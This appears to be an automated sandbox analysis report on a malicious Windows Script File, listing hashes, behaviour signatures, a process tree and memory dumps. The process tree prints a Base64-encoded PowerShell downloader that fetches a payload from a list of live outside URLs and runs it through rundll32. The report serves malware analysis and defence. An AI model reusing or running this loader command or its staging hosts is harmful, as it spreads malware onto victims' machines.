Analysis

  • max time kernel
    52s
  • max time network
    30s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    11/04/2023, 23:52

General

  • Target

    SX_April.11(82046).wsf

  • Size

    200KB

  • MD5

    a8c1462f4cd9447e107313230a6b2e70

  • SHA1

    a3be35d55d23ffca1a7ec95fc2d59173884b7ede

  • SHA256

    314a563c82382bf33f0ef0f90f481c2e742a710f678872732d59a57658816d03

  • SHA512

    0ec329ee2ac0b48883750cfd61fcd8dea320f48d2988d94ac2ba7e655f994b6fc3f754e6336c78de12aa595948a06e08ff0ab71f8470ce175e47995a2e6ef37a

  • SSDEEP

    6144:/WGVBHfU/OQ0HGNx1YL+SNj5tj86M4B3on1TuIFRBNE9HdjUNFP:pvHf+d48Yp8iBQ1PK9HdjQ

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SX_April.11(82046).wsf"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1136
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANAA7ACQAZABlAG0AZQBuAHQAaABvAGwAaQB6AGUASAB5AGIAcgBpAGQAaQB6AGUAcwAgAD0AIAAoACIAaAB0AHQAcABzADoALwAvAGMAaQBlAG4AdABpAGYAaQBjAGEAZwByAG8AdQBwAC4AYwBvAG0ALwBBAFIAdgBEAGkARQAvADYAaABYADcANwB5AEMAdgBIAEoAbwAsAGgAdAB0AHAAcwA6AC8ALwBpAGwAdQBtAGkAbgBhAHIAZQBvAGQAbwBuAHQAbwAuAGMAbwBtAC4AYgByAC8AOABLADMASQBBAC8ASwBkADkARwAwAFYANQBEAHMALABoAHQAdABwAHMAOgAvAC8AbgBvAG0AYQBkAGwAbwB2AGUALgBjAG8AbQAuAGIAcgAvAFYAUgA4AGYALwBxAHgAdQBpAFkATAB6AEcARgBXAGgAcwAsAGgAdAB0AHAAcwA6AC8ALwBpAGEAbgBqAGUAcwB1AHMAYwByAC4AbwByAGcALwAzAG4AUwBuAC8AUQBXADcAMABqAEIAMQBEAFIASwBzACwAaAB0AHQAcABzADoALwAvAGQAaQBhAGIAZQBmAGwAaQB4AC4AYwBsAHUAYgAvAFEANgBwAHkALwBRAEgATwBNAEMAeQBqAEIANQAsAGgAdAB0AHAAcwA6AC8ALwBtAGUAZABpAGMAYQBpAG4AdABsAC4AYwBvAG0ALwBDAG0AeQBIAC8AQQBaAEIAVwBTAEUANwBmAEkAWgBnAG4ALABoAHQAdABwAHMAOgAvAC8AaQBuAHMAdABpAHQAdQB0AG8AZQBrAGIAYQBsAGwAbwAuAG8AcgBnAC8ARAB1AFoAagBOAC8AZQBBAGEAdgBTAEkARgBaAHkAWQAxACwAaAB0AHQAcABzADoALwAvAGMAbwBuAGUAYwB0AGEAYgByAGEAegBpAGwAbgBlAHcAYgBhAG4AawAuAGMAbwBtAC8AdgB5AHgAQgAvAFkARgBEAGoAWQB0AEwAbwA3AGoAUgBRACwAaAB0AHQAcABzADoALwAvAGEAbABrAGEAbgBhAHIAaQBhAC0AdQBhAGUALgBjAG8AbQAvADMAaQB2AC8ASQByAGwAMwA4AEwAVwBLAHoARABMACwAaAB0AHQAcABzADoALwAvAGIAcwBkAHQAcgBlAGUAaQBuAGMALgBjAG8AbQAvADUARABZAC8ASQBMAE8ARwB3AHAAUwBjAGUAOAB4ACIAKQAuAHMAcABsAGkAdAAoACIALAAiACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAHAAaQBsAG8AdABhAGcAZQBzAFMAZQBtAGkAcgBlAGwAaQBnAGkAbwB1AHMAIABpAG4AIAAkAGQAZQBtAGUAbgB0AGgAbwBsAGkAegBlAEgAeQBiAHIAaQBkAGkAegBlAHMAKQAgAHsAdAByAHkAIAB7AHcAZwBlAHQAIAAkAHAAaQBsAG8AdABhAGcAZQBzAFMAZQBtAGkAcgBlAGwAaQBnAGkAbwB1AHMAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAIAAxADUAIAAtAE8AIAAkAGUAbgB2ADoAVABFAE0AUABcAEMAZQByAGEAcgBnAHkAcgBpAHQAZQAuAEkAbgB0AG8AbgBhAHQAaQBvAG4AYQBsADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAZQBuAHYAOgBUAEUATQBQAFwAQwBlAHIAYQByAGcAeQByAGkAdABlAC4ASQBuAHQAbwBuAGEAdABpAG8AbgBhAGwAKQAuAGwAZQBuAGcAdABoACAALQBnAGUAIAAxADAAMAAwADAAMAApACAAewBzAHQAYQByAHQAIAByAHUAbgBkAGwAbAAzADIAIAAkAGUAbgB2ADoAVABFAE0AUABcAFwAQwBlAHIAYQByAGcAeQByAGkAdABlAC4ASQBuAHQAbwBuAGEAdABpAG8AbgBhAGwALABOAGkAawBuADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANAA7AH0AfQA="
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:932

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/932-58-0x000000001B330000-0x000000001B612000-memory.dmp

    Filesize

    2.9MB

  • memory/932-59-0x0000000001F40000-0x0000000001F48000-memory.dmp

    Filesize

    32KB

  • memory/932-60-0x0000000002770000-0x00000000027F0000-memory.dmp

    Filesize

    512KB

  • memory/932-61-0x0000000002770000-0x00000000027F0000-memory.dmp

    Filesize

    512KB

  • memory/932-62-0x0000000002770000-0x00000000027F0000-memory.dmp

    Filesize

    512KB

  • memory/932-64-0x0000000002770000-0x00000000027F0000-memory.dmp

    Filesize

    512KB

  • memory/932-65-0x0000000002770000-0x00000000027F0000-memory.dmp

    Filesize

    512KB

  • memory/932-63-0x0000000002770000-0x00000000027F0000-memory.dmp

    Filesize

    512KB

  • memory/932-66-0x0000000002770000-0x00000000027F0000-memory.dmp

    Filesize

    512KB